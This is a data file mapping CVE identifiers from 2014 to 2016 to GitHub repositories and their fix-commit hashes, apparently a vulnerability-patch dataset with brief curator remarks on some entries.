-CVE-2014-9720;https://github.com/tornadoweb/tornado;None:None;False;c2a8c322b3f3f54f6525d7469ecab1af46862bc2,1c36307463b1e8affae100bf9386948e6c1b2308,7279a303d1c366aabd4facfc6b29ed46c3422350; -CVE-2014-9721;https://github.com/zeromq/zeromq4-x;None:None;False;b6e3e0f601e2c1ec1f3aac880ed6a3fe63043e51; -CVE-2014-9970;https://github.com/jboss-fuse/jasypt;None:None;False;8e62852a8018978ee19d39056c650fb66ffa0ff6; -CVE-2014-10068;https://github.com/hapijs/inert;None:None;False;48a7fab2f36016893a05bf29b8ac70d21feb495e,f1c70be886c968e9786ab7feae721132fabed448,e8f99f94da4cb08e8032eda984761c3f111e3e82,08931fcef7e67b3f6aac7b207eafa31d3754f1ef; -CVE-2014-10077;https://github.com/ruby-i18n/i18n;None:None;False;9c8b24031abe12d9024e69eccda76ea8061976ba,24e71a9a4901ed18c9cab5c53109fd9bf2416bcb; -CVE-2015-0204;https://github.com/openssl/openssl;None:None;False;ce325c60c74b0fa784f5872404b722e120e5cab0,37580f43b5a39f5f4e920d17273fab9713d3a744,08a88774bd8463bedf7fe440a165d3d98b702361,72f181539118828ca966a0f8d03f6428e2bcf0d6,4b4c1fcc88aec8c9e001b0a0077d3cd4de1ed0e6; -CVE-2015-0205;https://github.com/openssl/openssl;None:None;False;1421e0c584ae9120ca1b88098f13d6d2e90b83a3,a4aa18879917d9bd45f52ac110c69303a852b7db,f7fe3d235abf201343c20a59f9d9c8957acc62ff,be3fb8d15dd5a233eab0c454677d538e64d17f82,98a0f9660d374f58f79ee0efcc8c1672a805e8e8; -CVE-2015-0206;https://github.com/openssl/openssl;None:None;False;b095884a58876ccd3e65f620b7f80d61b4bce687,7c6a3cf2375f5881ef3f3a58ac0fbd0b4663abd1,103b171d8fc282ef435f8de9afbf7782e312961f,04685bc949e90a877656cf5020b6d4f90a9636a6; -CVE-2015-0208;https://github.com/openssl/openssl;None:None;False;4b22cce3812052fe64fc3f6d58d8cc884e3cb834,09f06923e636019c39c807cb59c481375e720556; -CVE-2015-0209;https://github.com/openssl/openssl;None:None;False;5e5d53d341fd9a9b9cc0a58eb3690832ca7a511f,9e442d485008046933cdc7da65080f436a4af089,c380bff888bfd5e48c4b24250ba1996b0fd1a5e3,dfc3e9698b755e179e8ae8e3cef7ff4e07cfd500,dac693c957dc40dbf839f0add91b824deba26dc3,a4517be9e348634ac64f9cf093131e13e8c03e38,89117535f1bb3ea72a17933b703271587d7aaf0b,ba5d0113e8bcb26857ae58a11b219aeb7bc2408a,1b4a8df38fc9ab3c089ca5765075ee53ec5bd66a,18029a3d0739284cadb309ea0fd498379b0bcfdb; -CVE-2015-0250;https://github.com/apache/xmlgraphics-batik;None:None;False;efebce3f0ad33ede916a148b84d75749aea38349; -CVE-2015-0276;https://github.com/zhumengyuan/kallithea;None:None;False;68183cc8e48e4e4fee8510ee819f903b3af3a01b; -CVE-2015-0286;https://github.com/openssl/openssl;None:None;False;e677e8d13595f7b3287f8feef7676feb301b0e8a,c3c7fb07dc975dc3c9de0eddb7d8fd79fc9c67c1,02758836731658381580e282ff403ba07d87b2f8,497d0b00dca876beb6c81f2ea6d7160897434c2e,c982285ab63adeb473197d54d246d120bf60778b; identified more twins -CVE-2015-0287;https://github.com/openssl/openssl;None:None;False;8106d61c354430d6bbbd7f8e7840a39efc0f5829,b717b083073b6cacc0a5e2397b661678aff7ae7f,7746ff501c65968203f376e46bd1eeb93efb0f64,674341f1b0548e36a6cc49917334f5cbd09aaa2c,b485d976340d3ca080060c3c7dee9102e2200762; -CVE-2015-0288;https://github.com/openssl/openssl;None:None;False;28a00bcd8e318da18031b2ac8778c64147cd54f9,241cff623e2b0f7c435a3a80ae783c29d994f061,4bf7b291692c59270ddca0e62de1f11611591cfc,51527f1e3564f210e984fe5b654c45d34e4f03d7,9fdbaf3a322689a58381c724e4f3497320a69581; -CVE-2015-0289;https://github.com/openssl/openssl;None:None;False;c0334c2c92dd1bc3ad8138ba6e74006c3631b0f9,544e3e3b69d080ee87721bd03c37b4d450384fb9,c225c3cf9bd67297fb0c297768d69cbc03fbdab7; -CVE-2015-0290;https://github.com/openssl/openssl;None:None;False;1d2a18dc5a3b3363e17db5af8b6b0273856ac077,77c77f0a1b9f15b869ca3342186dfbedd1119d0e; -CVE-2015-0292;https://github.com/openssl/openssl;None:None;False;fce3821111e3307a599d2378f2cca2ef2097c6c4,d0666f289ac013094bbbf547bfbcd616199b7d2d,9febee02720902c195fe929ecfe06362c551422c,84fe686173d519dfee5d264272beab666508fc57; -CVE-2015-0293;https://github.com/openssl/openssl;None:None;False;86f8fb0e344d62454f8daf3e15236b2b59210756,5cc6509dae697f0e74aaba73e1635f269a9c5e61; vulnerable tag is fixed -CVE-2015-0838;https://github.com/dulwich/dulwich;None:None;False;b25e8390074060ea2aed25cf070b8e98b85a3875; -CVE-2015-0846;https://github.com/jamesturk/django-markupfield;None:None;False;b45734ea1d206abc1ed2a90bdc779708066d49f3; -CVE-2015-1169;https://github.com/apereo/cas;None:None;False;8d22bfcb328a1948f40d29e11bdddc572e8d1363,1a8c5e98b81c649ce06a6a6ac8c5a6a9abddce73; -CVE-2015-1208;https://github.com/FFmpeg/FFmpeg;None:None;False;3ebd76a9c57558e284e94da367dd23b435e6a6d0,54b76eb5951502d24618c335d0bb275f70d31f3c; -CVE-2015-1326;https://github.com/martinpitt/python-dbusmock;None:None;False;4e7d0df909338eb3c44b083722c7bf8b76bdf940; -CVE-2015-1772;https://github.com/apache/hive;None:None;False;6929846a8120eaf094b914b4ca8af80b65f891c8; 1.1.1 did not contain it -CVE-2015-1782;https://github.com/libssh2/libssh2;None:None;False;7d94b69b802c03e8d7726f4ae61baba52cb7d871; -CVE-2015-1788;https://github.com/openssl/openssl;None:None;False;4924b37ee01f71ae19c94a8934b80eeb2f677932,40b8eb792d591d19751afc4d056c8e84260bdeb8,f61bbf8da532038ed0eae16a9a11771f3da22d30; -CVE-2015-1789;https://github.com/openssl/openssl;None:None;False;9bc3665ac9e3c36f7762acd3691e1115d250b030,57de3216e27c2e52bc3bc5bc7c94babdb7022179,f48b83b4fb7d6689584cf25f61ca63a4891f5b11,fa57f74a3941db6b2efb2f43c6add914ec83db20,370ac320301e28bb615cee80124c042649c95d14; -CVE-2015-1791;https://github.com/openssl/openssl;None:None;False;708cf593587e2fda67dae9782991ff9fccc781eb,dcad51bc13c9b716d9a66248bcc4038c071ff158,27c76b9b8010b536687318739c6f631ce4194688,370ac320301e28bb615cee80124c042649c95d14,939b4960276b040fc0ed52232238fcc9e2e9ec21,98ece4eebfb6cd45cc8d550c6ac0022965071afc,39bcfb129e816de00bf2170c3497e8104767beb7,8b4fd12b0d1734d281994000752c771e8cd0a103,467daf6b6ef0753ccfc5c024c2f63c948354d698,db96b5ab761fb97633dde9aec62c0032743e88f8,9545eac45bc79496763d2ded02629f88a8629fb9,0ae3473e8578b547100389bd029873af0cd9a22e,907f04a30354615e54beaa2bc0b986083f7793ee,106a9a5d7e26e728a654d7424849081bd988d4a5,d44f89c990b4c9c41f77e9a0ffd5dc7c4ca07f84; -CVE-2015-1792;https://github.com/openssl/openssl;None:None;False;dd90a91d8771fd1ad5083fd46a2b3da16a587757,857b2ced04be897488df311a257f254ad8516429,aa5ab40860deb3dc6d4d4c98a4efea99f7040a46,92f9a8bf3844359bb50d86dab92bc24b074d350d; advisory links wrong commit -CVE-2015-1793;https://github.com/openssl/openssl;None:None;False;9a0db453ba017ebcaccbee933ee6511a9ae4d1c8,2aacec8f4a5ba1b365620a7b17fcce311ada93ad,21376d8ae310cf0455ca2b73c8e9f77cafeb28dd,cb22d2ae5a5b6069dbf66dbcce07223ac15a16de,b3b1eb5735c5b3d566a9fc3bf745bf716a29afa0,aae41f8c54257d9fa6904d3a9aa09c5db6cefd0d,692f07c3e0c04180b56febc2feb57cd94395a7a2; -CVE-2015-1830;https://github.com/apache/activemq;None:None;False;729c4731574ffffaf58ebefdbaeb3bd19ed1c7b7,9fd5cb7dfe0fcc431f99d5e14206e0090e72f36b; -CVE-2015-1838;https://github.com/saltstack/salt;None:None;False;e11298d7155e9982749483ca5538e46090caef9c; -CVE-2015-2068;https://github.com/dweeves/magmi-git;None:None;False;da400ea5772dd7427c2c1732a6a3a29363bbabdf,408320a2118f7474a482e968cd72c881bc712564; -CVE-2015-2156;https://github.com/netty/netty;None:None;False;97d871a7553a01384b43df855dccdda5205ae77a,d98b21be045a315ced88ada84000e4757cfb9892; -CVE-2015-2296;https://github.com/psf/requests;None:None;False;e776bb26560fe5e9fe7ae72719519e1d011b5d23,3bd8afbff29e50b38f889b2f688785a669b9aafc; -CVE-2015-2912;https://github.com/orientechnologies/orientdb;None:None;False;f11dbced94cb587f445cb99db08735c023921053,d5a45e608ba8764fd817c1bdd7cf966564e828e9,5dbd6035e4e59259f3e08ba8f1218785f36d1d2d; -CVE-2015-2913;https://github.com/orientechnologies/orientdb;None:None;False;7a5f61527343eae30ee0e5dfdcae60da412c69c3,668ece96be210e742a4e2820a3085b215cf55104; -CVE-2015-3010;https://github.com/ceph/ceph-deploy;None:None;False;eee56770393bf19ed2dd5389226c6190c08dee3f,3cdc6cb555173130d64ea6d90033a6e00cbde330; -CVE-2015-3192;https://github.com/spring-projects/spring-framework;None:None;False;d79ec68db40c381b8e205af52748ebd3163ee33b,9c3580d04e84d25a90ef4c249baee1b4e02df15e,5a711c05ec750f069235597173084c2ee7962424; -CVE-2015-3193;https://github.com/openssl/openssl;None:None;False;29851264f11ccc70c6c0140d7e3d8d93ef5c9b11,d73cc256c8e256c32ed959456101b73ba9842f72; -CVE-2015-3195;https://github.com/openssl/openssl;None:None;False;cf432b3b1bd7caa22943b41b94ec2472ae497dc6,cc598f321fbac9c04da5766243ed55d55948637d,b29ffa392e839d05171206523e84909146f7a77c,2cdafc51f008e65b2d5263a80ad0e89e9b56c8d3; -CVE-2015-3196;https://github.com/openssl/openssl;None:None;False;3c66a669dfc7b3792f7af0758ea26fe8502ce70c,d6be3124f22870f1888c532523b74ea5d89795eb,1392c238657ec745af6a40def03d67d4ce02a082; -CVE-2015-3197;https://github.com/openssl/openssl;None:None;False;d81a1600588b726c2bdccda7efad3cc7a87d6245,4040a7fd104b412bd446338c6c28a62eb7d8e852; -CVE-2015-3206;https://github.com/02strich/pykerberos;None:None;False;02d13860b25fab58e739f0e000bed0067b7c6f9c; -CVE-2015-3208;https://github.com/apache/activemq-artemis;None:None;False;48d9951d879e0c8cbb59d4b64ab59d53ef88310d; -CVE-2015-3220;https://github.com/trevp/tlslite;None:None;False;aca8d4f898b436ff6754e1a9ab96cae976c8a853; -CVE-2015-3253;https://github.com/apache/groovy;None:None;False;4a96e70f6315d3b28fc6f878e4d59dfba585a179,4df8b652aa018a5d5d1cda8fba938bf3422db31c,09e9778e8a33052d8c27105aee5310649637233d,716d3e67e744c7edeed7cbc3f874090d39355764; -CVE-2015-3395;https://github.com/FFmpeg/FFmpeg;None:None;False;f7e1367f58263593e6cee3c282f7277d7ee9d553,99a69249837079417ca8bec6dd0515ca996a748e,33877cd276f99fc234b5269d9d158ce71e50d363,539172c85b13796fe5ce2a7482f436b6e9b33cf6,48c7fe5b5834a197f10a6eb56cbe7cda8ee32407,a376ef4a17edb947bbcf54171daa914bd4585a4f,dfce316c12d867400fb132ff5094163e3d2634a3,70642090960c35dcd6da941c869bdf55d4f3bb00,5ecabd3c54b7c802522dc338838c9a4c2dc42948; -CVE-2015-3627;https://github.com/docker-archive/libcontainer;None:None;False;46132cebcf391b56842f5cf9b247d508c59bc625; -CVE-2015-3996;https://github.com/AFNetworking/AFNetworking;None:None;False;3e631b203dd95bb82dfbcc2c47a2d84b59d1eeb4; -CVE-2015-4053;https://github.com/ceph/ceph-deploy;None:None;False;9f9fd6e3372043bd2fd67582324c8fb5d7aa361e,6fc7f7f58b338fa920a6a570485836fe91b6de21,ab240e32061ba5f89fca3d145fa229e8c8284edd,628bd9ed6bfb84821ba7d2240cc41a8783cc4617,5368d9d14d3bfbef480d1302511121768d557d5e,8ef6d41e5bdbaf2717671c1ace237d35fa8ebcb4,f898b4cf44abc1f7fe472b59e009e6ff44e441a7; -CVE-2015-4082;https://github.com/jborg/attic;None:None;False;78f9ad1faba7193ca7f0acccbc13b1ff6ebf9072; -CVE-2015-4410;https://github.com/mongoid/moped;None:None;False;dd5a7c14b5d2e466f7875d079af71ad19774609b; wrong repository??? -CVE-2015-4412;https://github.com/mongodb/bson-ruby;None:None;False;976da329ff03ecdfca3030eb6efe3c85e6db9999; there is also a false positive (vulnerability introducing commit) -CVE-2015-4619;https://github.com/denkGroot/Spina;None:None;False;bfe44f289e336f80b6593032679300c493735e75; -CVE-2015-4706;https://github.com/ipython/ipython;None:None;False;6884e8b36dc1e2d59e1d8ddb5e95788728d76e6f,7222bd53ad089a65fd610fab4626f9d0ab47dfce,c2078a53543ed502efd968649fee1125e0eb549c; -CVE-2015-5081;https://github.com/django-cms/django-cms;None:None;False;f77cbc607d6e2a62e63287d37ad320109a2cc78a; -CVE-2015-5147;https://github.com/vmg/redcarpet;None:None;False;2cee777c1e5babe8a1e2683d31ea75cc4afe55fb; -CVE-2015-5159;https://github.com/latchset/kdcproxy;None:None;False;f274aa6787cb8b3ec1cc12c440a56665b7231882,5edbbeb7f950ed9db60b11f0fdce1ec96194f761; -CVE-2015-5207;https://github.com/apache/cordova-ios;None:None;False;a14e08eaa95211450f513c64d569d8c333dee4c5; commit outside the time interval -CVE-2015-5211;https://github.com/spring-projects/spring-framework;None:None;False;a95c3d820dbc4c3ae752f1b3ee22ee860b162402,03f547eb9868f48f44d59b56067d4ac4740672c3,2bd1daa75ee0b8ec33608ca6ab065ef3e1815543; -CVE-2015-5241;https://github.com/apache/juddi;None:None;False;018b5623cbf34b5810a1c6a7813d7d3c320bdbe0; -CVE-2015-5250;https://github.com/openshift/origin;None:None;False;dace5075e31b74703e944b6b3ebe8836be8d1b9a,5d021b0f3e0902b599fd8f528eb28a710aed223a,c55e4c7d12e15d83642b5872e620ecc5b35cb947; -CVE-2015-5253;https://github.com/apache/cxf;None:None;False;845eccb6484b43ba02875c71e824db23ae4f20c0,a61db289f87e448292f7ff0d0a3d25792dd4d42d,02245c656941f28b6b2be5e461e6db04a70d2436; -CVE-2015-5254;https://github.com/apache/activemq;None:None;False;e7a4b53f799685e337972dd36ba0253c04bcc01f,6f03921b31d9fefeddb0f4fa63150ed1f94a14b1,a7e2a44fe8d4435ae99532eb0ab852e6247f7b16,e100638244c4ca5eb2a1f16bcdc671c9859c2694; -CVE-2015-5305;https://github.com/kubernetes/kubernetes;None:None;False;8e07d2fc9312ed4f4fddd05d816b299754c1e967,63fb6c07a565fcb94df7778ad12f810ea1b3cdce,68f2add9bd5d43b9da1424d87d88f83d120e17d0,37f730f68c7f06e060f90714439bfb0dbb2df5e7; NVD does not contain versions at all -CVE-2015-5344;https://github.com/apache/camel;None:None;False;157c0b4a3c8017de432f1c99f83e374e97dc4d36,4cdc6b177ee7391eedc9f0b695c05d56f84b0812,b7afb3769a38b8e526f8046414d4a71430d77df0,369d0a6d605055cb843e7962b101e3bbcd113fec,8386d8f7260143802553bc6dbae2880d6c0bafda,4491c080cb6c8659fc05441e49307b7d4349aa56; -CVE-2015-5349;https://github.com/apache/directory-studio;None:None;False;ac57a26fcb98aa17fe9534575cf5fdad00a1c839; -CVE-2015-5607;https://github.com/ipython/ipython;None:None;False;1415a9710407e7c14900531813c15ba6165f0816,a05fe052a18810e92d9be8c1185952c13fe4e5b0; -CVE-2015-6524;https://github.com/apache/activemq;None:None;False;22f2f3dde757d31307da772d579815c1d169bc39; -CVE-2015-6584;https://github.com/DataTables/DataTablesSrc;None:None;False;ccf86dc5982bd8e16d11a0815c940f5b256874c9; -CVE-2015-6748;https://github.com/jhy/jsoup;None:None;False;4edb78991f8d0bf87dafde5e01ccd8922065c9b2,b86beca8feb26f9a3181e87fe36382f8ab4bdb98; -CVE-2015-6818;https://github.com/FFmpeg/FFmpeg;None:None;False;47f4e2d8960ca756ca153ab8e3e93d80449b8c91,e84d17c7c991f380622f6d2f25994dc6955d853c; -CVE-2015-6821;https://github.com/FFmpeg/FFmpeg;None:None;False;b160fc290cf49b516c5b6ee0730fd9da7fc623b1,88fa3243ddf320ce1d6691c6098e87263bd6d0ca; -CVE-2015-6822;https://github.com/FFmpeg/FFmpeg;None:None;False;39bbdebb1ed8eb9c9b0cd6db85afde6ba89d86e4,237751eb257fd528a91f35f0a835c2273957ee62; -CVE-2015-6823;https://github.com/FFmpeg/FFmpeg;None:None;False;f7068bf277a37479aecde2832208d820682b35e6,264eb0074f3b0591c9430b20927d6547c8757c48; -CVE-2015-6824;https://github.com/FFmpeg/FFmpeg;None:None;False;a5d44d5c220e12ca0cb7a4eceb0f74759cb13111,1cbd7b08f661163ea0f41f03752e420a47904c11; -CVE-2015-6826;https://github.com/FFmpeg/FFmpeg;None:None;False;3197c0aa87a3b7190e17d49e6fbc7b554e4b3f0a; -CVE-2015-6918;https://github.com/saltstack/salt;None:None;False;28aa9b105804ff433d8f663b2f9b804f2b75495a,528916548726976dcc75626dc6f6641ceb206ee3; -CVE-2015-7294;https://github.com/vesse/node-ldapauth-fork;None:None;False;3feea43e243698bcaeffa904a7324f4d96df60e4; -CVE-2015-7314;https://github.com/gollum/gollum;None:None;False;ce68a88293ce3b18c261312392ad33a88bb69ea1,de5aed2f6a6f9ad62cae05dc59d16fbfdd7a4543; -CVE-2015-7315;https://github.com/zopefoundation/Products.CMFCore;None:None;False;a4ff51ce26c50001db0f7856009771340e6ecda3,e1dc70a6198073f2ceedbe725a93cde57c7bfb34,13b83717b2c3a9fb2f0c16c436ec8d986f42b0e5,e1d981bfa14b664317285f0f36498f4be4a23406; -CVE-2015-7316;https://github.com/plone/Products.CMFPlone;None:None;False;3da710a2cd68587f0bf34f2e7ea1167d6eeee087,1845b0a92312291811b68907bf2aa0fb448c4016; -CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e5967; -CVE-2015-7528;https://github.com/kubernetes/kubernetes;None:None;False;afd56495a1052a3387b81df1786a8d0f51bc8671,4b1afe5b7483cba2907032b5910fcd41a48bbbec,da039b4a940a471d7025ce882b8392f8de10ea2b,9158aa1f09213c6e7118c55a95442d8a12d496b2; this was kubernetes -CVE-2015-7541;https://github.com/quadule/colorscore;None:None;False;570b5e854cecddd44d2047c44126aed951b61718; -CVE-2015-7559;https://github.com/apache/activemq;None:None;False;338a74dfa42a7b19d39adecacfa5f626a050e807,b8fc78ec6c367cbe2a40a674eaec64ac3d7d1ecb; vulnerable tag is fixed -CVE-2015-7577;https://github.com/rails/rails;None:None;False;0fde6f554b75b13b0435dd70f1c3ec02bc209e0d,5875bc3adeff7583cd2fca756f8c61fcb1bc2366,cdabc95608336dbea7b6a3a3e925de5bbd5313ba,2cb466353f2af080e73eaf66ba033ee27df9b9b5; -CVE-2015-7809;https://github.com/fabpot/Twig;None:None;False;30be07759a3de2558da5224f127d052ecf492e8f; -CVE-2015-8213;https://github.com/django/django;None:None;False;316bc3fc9437c5960c24baceb93c73f1939711e4,3ebbda0aef9e7a90ac6208bb8f9bc21228e2c7da,9f83fc2f66f5a0bac7c291aec55df66050bb6991,8a01c6b53169ee079cb21ac5919fdafcc8c5e172; -CVE-2015-8216;https://github.com/FFmpeg/FFmpeg;None:None;False;d24888ef19ba38b787b11d1ee091a3d94920c76a,fdb884263974b19584a4f37508d71bc60189f512; -CVE-2015-8217;https://github.com/FFmpeg/FFmpeg;None:None;False;93f30f825c08477fe8f76be00539e96014cc83c8,ff30907205fc4a9666a7ee93ca456e3a5bcacbc0; -CVE-2015-8218;https://github.com/FFmpeg/FFmpeg;None:None;False;d4a731b84a08f0f3839eaaaf82e97d8d9c67da46,a7bbb7fb884a02a7b380ef7afa787fca756b9d82; -CVE-2015-8309;https://github.com/devsnd/cherrymusic;None:None;False;62dec34a1ea0741400dd6b6c660d303dcd651e86; -CVE-2015-8310;https://github.com/devsnd/cherrymusic;None:None;False;62dec34a1ea0741400dd6b6c660d303dcd651e86; -CVE-2015-8618;https://github.com/golang/go;None:None;False;0027ed1872cdec08defe3b097c7123eaaf149e30,4306352182bf94f86f0cfc6a8b0ed461cbf1d82c; -CVE-2015-8747;https://github.com/Unrud/Radicale;None:None;False;bcaf452e516c02c9bed584a73736431c5e8831f1; -CVE-2015-8748;https://github.com/Kozea/Radicale;None:None;False;1109973a925970353dfd13c6df8de0e4e446d983,4bfe7c9f7991d534c8b9fbe153af9d341f925f98; -CVE-2015-8814;https://github.com/umbraco/Umbraco-CMS;None:None;False;18c3345e47663a358a042652e697b988d6a380eb; -CVE-2015-8854;https://github.com/markedjs/marked;None:None;False;a37bd643f05bf95ff18cafa2b06e7d741d2e2157; -CVE-2015-8861;https://github.com/handlebars-lang/handlebars.js;None:None;False;83b8e846a3569bd366cf0b6bdc1e4604d1a2077e; -CVE-2015-8862;https://github.com/janl/mustache.js;None:None;False;378bcca8a5cfe4058f294a3dbb78e8755e8e0da5; -CVE-2015-8968;https://github.com/square/git-fastclone;None:None;False;14198fe12443055839b1ba4cc294b04a38ae15f1,a8a33f187214185b885a10bcfe2527c74da84a8c,2b7a0be1ff8a4de2f43338e91649d6c4988bf994,93a4634abca94464387a8bde5a3062e858fc0f1e; -CVE-2015-9235;https://github.com/auth0/node-jsonwebtoken;None:None;False;1bb584bc382295eeb7ee8c4452a673a77a68b687; -CVE-2015-9241;https://github.com/hapijs/hapi;None:None;False;aab2496e930dce5ee1ab28eecec94e0e45f03580; -CVE-2015-9243;https://github.com/hapijs/hapi;None:None;False;270e9a768b2fbb84ab832869d2de606c865f0e85,353bf2661d15f4529e6f70498681a385ec2daa77; -CVE-2015-9251;https://github.com/jquery/jquery;None:None;False;b078a62013782c7424a4a61a240c23c4c0b42614,f60729f3903d17917dc351f3ac87794de379b0cc; -CVE-2016-0750;https://github.com/infinispan/infinispan;None:None;False;f2989a9b7b5ef2d3be690250d9d1bc7b2fa045d7; -CVE-2016-0762;https://github.com/apache/tomcat;None:None;False;970e615c7ade6ec6c341470bbc76aa1256353737,86b2e436099cb48f30dad950175c5beeeb763756; -CVE-2016-1505;https://github.com/Unrud/Radicale;None:None;False;b4b3d51f33c7623d312f289252dd7bbb8f58bbe6; -CVE-2016-1905;https://github.com/deads2k/kubernetes;None:None;False;21a5d57c7551d99d195a38edc8b06bdc807aa4c1,e90c2bd7dcf506dee91f30ea35b3c72f83a38fba; -CVE-2016-2108;https://github.com/openssl/openssl;None:None;False;d7ab691bc479d3cf2eea07329db6ce0e2589f0b9,a0eed48d37a4b7beea0c966caf09ad46f4a92a44,f5da52e308a6aeea6d5f3df98c4da295d7e9cc27,32d3b0f52f77ce86d53f38685336668d47c5bdfe,3661bb4e7934668bd99ca777ea8b30eedfafa871; was 1.0.2b:1.0.2c -CVE-2016-2160;https://github.com/openshift/origin;None:None;False;2d0350c84150d88be4d1ac181694366832a55709,26e798bea2f765fcb48ae351321b7ae38a329201,a77c100b57f481d5a729bebbc8771222e147964d; does not specify versions (1.1.4 is fixed) -CVE-2016-2166;https://github.com/apache/qpid-proton;None:None;False;a0585851e1e8ed9678496e38278f4a7554d03636; fixed tag is vulnerable (happend when using git svn and the copying to github) -CVE-2016-2177;https://github.com/openssl/openssl;None:None;False;a004e72b95835136d3f1ea90517f706c24c03da7,6f35f6deb5ca7daebe289f86477e061ce3ee5f46; -CVE-2016-2512;https://github.com/django/django;None:None;False;c5544d289233f501917e25970c03ed444abbd4f0,ada7a4aefb9bec4c34667b511022be6057102f98,fc6d147a63f89795dbcdecb0559256470fff4380,382ab137312961ad62feb8109d70a5a581fe8350; -CVE-2016-2513;https://github.com/django/django;None:None;False;67b46ba7016da2d259c1ecc7d666d11f5e1cfaab,af7d09b0c5c6ab68e629fd9baf736f9dd203b18e,f4e6e02f7713a6924d16540be279909ff4091eb6; -CVE-2016-2537;https://github.com/mafintosh/is-my-json-valid;None:None;False;eca4beb21e61877d76fdf6bea771f72f39544d9b; -CVE-2016-2788;https://github.com/puppetlabs/marionette-collective;None:None;False;4de959d0eae2b4cfc5ed4a0f5f659d4bf49cbedb,39dc1af951e880bf787d48d860cf0da25e6725ea,4918a0f136aea04452b48a1ba29eb9aabcf5c97d; -CVE-2016-3081;https://github.com/apache/struts;None:None;False;f238cf4f1091be19fbcfd086b042c86a1bcaa7fc,5190b53673a710ead31bbb5f82cf4ca171994629; -CVE-2016-3092;https://github.com/apache/tomcat;None:None;False;8999f8243197a5f8297d0cb1a0d86ed175678a77,2c3553f3681baf775c50bb0b49ea61cb44ea914f,8e67e4a4799a9765b3bd777eed3ee17f00514441; -CVE-2016-3094;https://github.com/apache/qpid-broker-j;None:None;False;24aaee1df7c3e408d89bebbc3426bcdd94dfb6c0,a4c8ecf0ac4884f63cfd57c07c12a144863c896c; -CVE-2016-3114;https://github.com/NexMirror/Kallithea;None:None;False;460fec61ad108252b7f56575211914e0f82ea6e8; -CVE-2016-3693;https://github.com/svenfuchs/safemode;None:None;False;0f764a1720a3a68fd2842e21377c8bfad6d7126f; -CVE-2016-3720;https://github.com/FasterXML/jackson-dataformat-xml;None:None;False;f0f19a4c924d9db9a1e2830434061c8640092cc0; -CVE-2016-3959;https://github.com/golang/go;None:None;False;eb876dd83cb8413335d64e50aae5d38337d1ebb4,2cfbb875208f4acecfb0b72de5aebe37e8d03a35,2d8ecac3d0dbceed8830a43a3e752770577ffed1; -CVE-2016-4000;https://github.com/jython/frozen-mirror;None:None;False;4c337213bd2964bb36cef2d31509b49647ca6f2a; -CVE-2016-4009;https://github.com/python-pillow/Pillow;None:None;False;1723dc2d0709d4e3e65333dfcabcfddd25c0f83e,4e0d9b0b9740d258ade40cce248c93777362ac1e,95a25a0d82f414a52e174eb5389d485d4b3ddf34,41fae6d9e2da741d2c5464775c7f1a609ea03798; -CVE-2016-4055;https://github.com/moment/moment;None:None;False;34af63b8b21208a949dfaf42d228502c73d20ec0,52a807b961ead925be11ff5e632c8f7325a9ce36; -CVE-2016-4425;https://github.com/akheron/jansson;None:None;False;64ce0ad3731ebd77e02897b07920eadd0e2cc318,013c3892c3b7c39516507838ababb4e9167cc65c; -CVE-2016-4438;https://github.com/apache/struts;None:None;False;76eb8f38a33ad0f1f48464ee1311559c8d52dd6d; -CVE-2016-4442;https://github.com/MiniProfiler/rack-mini-profiler;None:None;False;4273771d65f1a7411e3ef5843329308d0e2d257c; -CVE-2016-4465;https://github.com/apache/struts;None:None;False;eccc31ebce5430f9e91b9684c63eaaf885e603f9,a0fdca138feec2c2e94eb75ca1f8b76678b4d152; -CVE-2016-4562;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; -CVE-2016-4563;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; -CVE-2016-4564;https://github.com/ImageMagick/ImageMagick;None:None;False;726812fa2fa7ce16bcf58f6e115f65427a1c0950; -CVE-2016-4855;https://github.com/ADOdb/ADOdb;None:None;False;fc80385305963905a3ad9f87e6fb83df4c235198,292e4a9433fe96f02cccc2313a7198efee844214; test file... -CVE-2016-4970;https://github.com/netty/netty;None:None;False;524156f164a910b8b0978d27a2c700a19cd8048f,9e2c400f89c5badc39919f811179d3d42ac5257c; -CVE-2016-4972;https://github.com/openstack/python-muranoclient;None:None;False;b1e8a1753ccc3faf06840f675403645311ac9d79,cd182ba363a11078ae7a0595f54751c1ebddd2e0,e470430814ceddadea66d2e4bb3a9b10b55869e6; -CVE-2016-4974;https://github.com/apache/qpid-jms-amqp-0-x;None:None;False;7e6843e2e1967bfdba477a683353dbf6287d6291; -CVE-2016-4977;https://github.com/spring-projects/spring-security-oauth;None:None;False;fff77d3fea477b566bcacfbfc95f85821a2bdc2d; -CVE-2016-5007;https://github.com/spring-projects/spring-security;None:None;False;e4c13e3c0ee7f06f59d3b43ca6734215ad7d8974; -CVE-2016-5104;https://github.com/libimobiledevice/libimobiledevice;None:None;False;df1f5c4d70d0c19ad40072f5246ca457e7f9849e; -CVE-2016-5180;https://github.com/c-ares/c-ares;None:None;False;65c71be1cbe587f290432bef2f669ee6cb8ac137; -CVE-2016-5386;https://github.com/golang/go;None:None;False;b97df54c31d6c4cc2a28a3c83725366d52329223,cad4e97af8f2e0b9f09b97f67fb3a89ced2e9021,a357d15e9ee36a1232ae071d9968c4cf10a672b4; -CVE-2016-5388;https://github.com/apache/tomcat80;None:None;False;1977bf9df699c571cf3e08c2996533b959d4cb1e; -CVE-2016-5431;https://github.com/nov/jose-php;None:None;False;1cce55e27adf0274193eb1cd74b927a398a3df4b; -CVE-2016-5697;https://github.com/onelogin/ruby-saml;None:None;False;a571f52171e6bfd87db59822d1d9e8c38fb3b995; -CVE-2016-5841;https://github.com/ImageMagick/ImageMagick;None:None;False;d8ab7f046587f2e9f734b687ba7e6e10147c294b; -CVE-2016-5842;https://github.com/ImageMagick/ImageMagick;None:None;False;d8ab7f046587f2e9f734b687ba7e6e10147c294b; -CVE-2016-5851;https://github.com/python-openxml/python-docx;None:None;False;61b40b161b64173ab8e362aec1fd197948431beb; -CVE-2016-6186;https://github.com/django/django;None:None;False;93c538694e6b14a29cb0f52b784a3bfed604fda6,6fa150b2f8b601668083042324c4add534143cb1,d03bf6fe4e9bf5b07de62c1a271c4b41a7d3d158,f68e5a99164867ab0e071a936470958ed867479d; -CVE-2016-6298;https://github.com/latchset/jwcrypto;None:None;False;eb5be5bd94c8cae1d7f3ba9801377084d8e5a7ba; 